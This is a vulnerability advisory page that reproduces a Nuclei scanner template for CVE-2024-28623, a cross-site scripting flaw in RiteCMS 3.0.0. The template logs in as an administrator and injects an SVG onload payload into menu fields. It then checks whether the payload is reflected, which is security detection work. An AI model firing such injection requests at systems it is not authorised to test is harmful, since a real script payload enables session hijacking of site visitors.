CVE-2024-28623: RiteCMS 3.0.0 - Cross-site Scripting

日期: 2025-08-01 | 影响软件: RiteCMS | POC: 已公开

漏洞描述

RiteCMS v3.0.0 contains a reflected XSS caused by unsanitized input in the main_menu/edit_section component, letting attackers execute arbitrary scripts in the context of the victim's browser.

PoC代码[已公开]

id: CVE-2024-28623

info:
  name: RiteCMS 3.0.0 - Cross-site Scripting
  author: 0x_Akoko
  severity: medium
  description: |
    RiteCMS v3.0.0 contains a reflected XSS caused by unsanitized input in the main_menu/edit_section component, letting attackers execute arbitrary scripts in the context of the victim's browser.
  impact: |
    Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
  remediation: |
    Sanitize and validate input in the main_menu/edit_section component, and update to the latest version if available.
  reference:
    - https://github.com/GURJOTEXPERT/ritecms
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28623
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-28623
    cwe-id: CWE-79
    epss-score: 0.00103
    epss-percentile: 0.29279
    cpe: cpe:2.3:a:ritecms:ritecms:3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: ritecms
    product: ritecms
    fofa-query: title="RiteCMS"
  tags: cve,cve2024,ritecms,xss,oss,authenticated

variables:
  string: "{{rand_text_numeric(13)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /admin.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&userpw={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
        internal: true

  - raw:
      - |
        POST /admin.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        mode=menus&menu=main_menu&edit_item=4&name=faq&title=faq&link=faq&section='"><svg/onload=console.log('{{string}}')>&accesskey='"><svg/onload=console.log('{{string}}')>&submenu='"><svg/onload=console.log('{{string}}')>&edit_menu_item_submitted=%C2%A0OK%C2%A0

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "{{string}}", "RiteCMS")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402207f06b5bc0527e52c7f7838da889bb8fc882b94146d9f7b029906b50eb26a7cfd022076fd4924b71cb5a093f3b503d24a6c66a478c16c7b399b1a32d3645216481693:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/CVE-2024-28623.yaml

相关漏洞推荐